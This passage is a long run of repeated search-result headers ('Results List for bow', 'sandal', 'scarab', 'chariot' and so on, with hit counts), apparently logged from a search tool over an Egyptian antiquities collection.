25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for fruit - (hits/occ.: 9)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for basket - (hits/occ.: 128)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for fruit - (hits/occ.: 9)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for scarab - (hits/occ.: 15)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for fruit - (hits/occ.: 9)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for gauntlet - (hits/occ.: 15)Results List for arrow - (hits/occ.: 29)Results List for fruit - (hits/occ.: 9)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for gauntlet - (hits/occ.: 15)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for fruit - (hits/occ.: 9)Results List for jar - (hits/occ.: 61)Results List for scarab - (hits/occ.: 15)Results List for loin - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for de - (hits/occ.: 418)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for scarab - (hits/occ.: 15)Results List for glove - (hits/occ.: 10)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for scarab - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for aten - (hits/occ.: 1)Results List for shield - (hits/occ.: 8)Results List for shield - (hits/occ.: 8)Results List for anubus - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for canopic chest - (hits/occ.: 1)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for anubis shrine - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for seal - (hits/occ.: 16)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for seal - (hits/occ.: 16)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for jar - (hits/occ.: 61)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for gauntlet - (hits/occ.: 15)Results List for gauntlet - (hits/occ.: 15)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for anubis - (hits/occ.: 5)Results List for jar - (hits/occ.: 61)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for basket - (hits/occ.: 128)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for arrow - (hits/occ.: 29)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bouquet - (hits/occ.: 6)Results List for - (hits/occ.: 0)Results List for wreath - (hits/occ.: 1)Results List for garland - (hits/occ.: 2)Results List for bouquet - (hits/occ.: 6)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for basket - (hits/occ.: 128)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for jar - (hits/occ.: 61)Results List for bouquet - (hits/occ.: 6)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for jar - (hits/occ.: 61)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 14)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for garland - (hits/occ.: 2)Results List for basket - (hits/occ.: 128)Results List for bouquet - (hits/occ.: 6)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for de - (hits/occ.: 418)Results List for wreath - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for garland - (hits/occ.: 2)Results List for de - (hits/occ.: 418)Results List for bouquet - (hits/occ.: 6)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for - (hits/occ.: 0)Results List for wreath - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for seal - (hits/occ.: 16)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bouquet - (hits/occ.: 6)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for glass - (hits/occ.: 28)Results List for de - (hits/occ.: 418)Results List for silver stick - (hits/occ.: 1)Results List for golden stick - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for gold stick - (hits/occ.: 3)Results List for bow - (hits/occ.: 14)Results List for glass - (hits/occ.: 28)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for garland - (hits/occ.: 2)Results List for akhenaten%2c nefertiti%2c and three daughters - (hits/occ.: 0)Results List for akhenaten%2c nefertiti%2c and three daughters - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bouquet - (hits/occ.: 6)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for cow%20bed - (hits/occ.: 0)Results List for cow bed - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for head - (hits/occ.: 29)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for head - (hits/occ.: 29)Results List for chariot - (hits/occ.: 135)Results List for wreath - (hits/occ.: 1)Results List for painted box - (hits/occ.: 1)Results List for bouquet - (hits/occ.: 6)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for anubis - (hits/occ.: 5)Results List for garland - (hits/occ.: 2)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bouquet - (hits/occ.: 6)Results List for bow - (hits/occ.: 59)Results List for jar - (hits/occ.: 61)Results List for jar - (hits/occ.: 61)Results List for de - (hits/occ.: 418)Results List for cow%20bed - (hits/occ.: 0)Results List for cow bed - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 14)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for wreath - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for bouquet - (hits/occ.: 6)Results List for seal - (hits/occ.: 16)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for loin - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for wreath - (hits/occ.: 1)Results List for bouquet - (hits/occ.: 6)Results List for de - (hits/occ.: 418)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for seal - (hits/occ.: 16)Results List for garland - (hits/occ.: 2)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for axe - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for chariot - (hits/occ.: 135)Results List for mace - (hits/occ.: 3)Results List for chariot - (hits/occ.: 135)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for basket - (hits/occ.: 128)Results List for military - (hits/occ.: 0)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for head - (hits/occ.: 29)Results List for de - (hits/occ.: 418)Results List for seal - (hits/occ.: 16)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for de - (hits/occ.: 418)Results List for chariot - (hits/occ.: 135)Results List for cow bed - (hits/occ.: 0)Results List for cow bed - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for mask - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for bouquet - (hits/occ.: 6)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for label - (hits/occ.: 20)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 14)Results List for wreath - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for de - (hits/occ.: 418)Results List for wood - (hits/occ.: 326)Results List for garland - (hits/occ.: 2)Results List for loin - (hits/occ.: 25)Results List for bouquet - (hits/occ.: 6)Results List for anubis - (hits/occ.: 5)Results List for de - (hits/occ.: 418)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for de - (hits/occ.: 418)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for de - (hits/occ.: 418)Results List for wreath - (hits/occ.: 1)Results List for chariot - (hits/occ.: 135)Results List for seal - (hits/occ.: 16)Results List for bouquet - (hits/occ.: 6)Results List for de - (hits/occ.: 418)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for de - (hits/occ.: 418)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for 1 - (hits/occ.: 145)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for gauntlet - (hits/occ.: 15)Results List for 1 - (hits/occ.: 145)Results List for seal - (hits/occ.: 16)Results List for de - (hits/occ.: 418)Results List for wreath - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for garland - (hits/occ.: 2)Results List for bouquet - (hits/occ.: 6)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for wreath - (hits/occ.: 1)Results List for de - (hits/occ.: 418)Results List for bow - (hits/occ.: 59)Results List for bouquet - 